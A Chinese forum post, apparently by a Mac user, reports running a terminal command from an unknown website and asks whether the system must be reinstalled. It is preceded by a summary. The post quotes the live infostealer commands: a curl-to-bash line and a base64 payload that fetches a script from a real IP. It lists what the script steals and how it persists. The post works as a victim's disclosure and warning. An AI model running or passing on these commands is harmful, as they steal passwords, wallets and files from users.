⚠️ **警惕不明来源的终端命令**：文章强调了执行来自未知网站或不信任来源的终端命令的巨大风险。作者本人即因一时疏忽，在未完全理解命令内容的情况下执行了脚本，导致了后续的安全问题。这提醒所有用户，在复制粘贴任何终端命令前，务必进行充分的了解和验证，尤其是在涉及管理员权限（如输入密码）的操作时。

🔑 **多重敏感信息泄露风险**：该恶意脚本旨在窃取多种关键信息，包括但不限于：用户在系统提示框中输入的开机密码、多种主流加密货币的浏览器钱包（如MetaMask, Phantom, Trust Wallet）和桌面钱包（如Exodus, Atomic, Ledger Live）的数据、所有主流浏览器的登录凭证、Cookies、浏览历史、信用卡信息，以及系统钥匙串和备忘录中的敏感内容。

📄 **深度文件扫描与窃取**：除了常见的密码和钱包信息，该脚本还会主动扫描并复制用户电脑上的特定类型文件，特别是桌面和文稿文件夹中的.pdf, .docx, .txt, .wallet, .key等格式的文件。这表明攻击者不仅目标是直接的数字资产，还可能搜集与用户身份、财务信息相关的各类文档。

🚪 **持久化后门与程序替换**：脚本的恶意之处还在于其持久化的能力。它会利用用户输入的密码在系统中创建启动守护进程（LaunchDaemon），确保恶意软件在电脑重启后仍能自动运行，为黑客提供持续的访问权限。此外，它还可能尝试用恶意版本替换用户电脑上正版的Ledger Live应用，进一步加密货币资产。

🚨 **应对策略与系统重装必要性**：面对此类深度感染，文章暗示重装系统可能是最彻底的解决方案，以清除可能存在的后门和被篡改的文件。同时，建议用户立即修改所有可能泄露的密码，并警惕任何异常的系统提示或软件行为，以进一步保护账户安全。

趁周末没事折腾了一下自己的 Mac ，下了一堆乱七八糟的软件

刚刚有个网站给了我一个命令，要在终端执行。命令是 /bin/bash -c "$(curl -fsSL shoter.org/c/maxx2)"

感觉是熬夜脑子不清醒了，我真就傻乎乎输入密码执行了脚本，听到 mac 一阵叮叮钉钉的提示音才感觉不对劲

看了一下这个命令实际执行的是 echo "Y3VybCAtcyBodHRwOi8vMTg1LjkzLjg5LjYyL2QvYm9zczU0MjM1IHwgbm9odXAgYmFzaCAm" | base64 -d | bash 会对应执行 http://185.93.89.62/d/boss54235 这上面的脚本

看到这个命令的时候，脑子都凉了，把脚本喂给 Gemini 告诉我说会去执行以下命令

窃取密码 🔑它会弹出一个伪造的系统对话框，谎称“需要安装应用助手”，诱骗你输入电脑的开机密码。如果你不输入正确的密码，这个对话框会一直骚扰你。

窃取加密货币钱包 💰 (主要目标)浏览器钱包: 它有一个庞大的列表，专门扫描并窃取数十种加密货币钱包浏览器插件的数据，例如 MetaMask 、Phantom 、Trust Wallet 等。

桌面钱包: 它还会扫描并窃取你电脑上安装的桌面钱包程序数据，例如 Exodus, Atomic, Ledger Live, Coinomi, Electrum 等。

窃取各类浏览器数据 🌐它会攻击市面上几乎所有的主流浏览器（ Chrome, Safari, Firefox, Edge, Brave, Opera 等）。

窃取内容包括：保存的登录名和密码、Cookies (可以用来登录你的账户)、历史记录、信用卡信息等。

窃取个人敏感文件 📄钥匙串 (Keychain): 复制你整个系统钥匙串文件，里面可能包含你的 Wi-Fi 密码、应用密码等。

备忘录 (Notes): 提取你“备忘录”应用里的所有文字内容。

本地文件: 扫描你的“桌面”和“文稿”文件夹，专门寻找 .pdf, .docx, .txt, .wallet, .key 等敏感文件并进行复制。

打包上传，发送给黑客 📤它会将以上窃取到的所有信息打包成一个 .zip 压缩文件。

然后将这个文件上传到黑客的服务器（ IP 地址为 185.93.89.62 ，和你之前那个脚本是同一个地址）。

植入后门并替换正常程序 🚪持久化后门: 它会用你输入的密码，在系统里创建一个启动守护进程 (LaunchDaemon)。这意味着即时你重启电脑，这个恶意软件也会自动运行，让黑客可以持续控制你的电脑。

程序木马化: 它会尝试用一个从黑客服务器下载的恶意版本来替换你电脑上正版的 Ledger Live 加密钱包应用。

这个是不是只能重装系统了？我还要做什么来保护自己的账户吗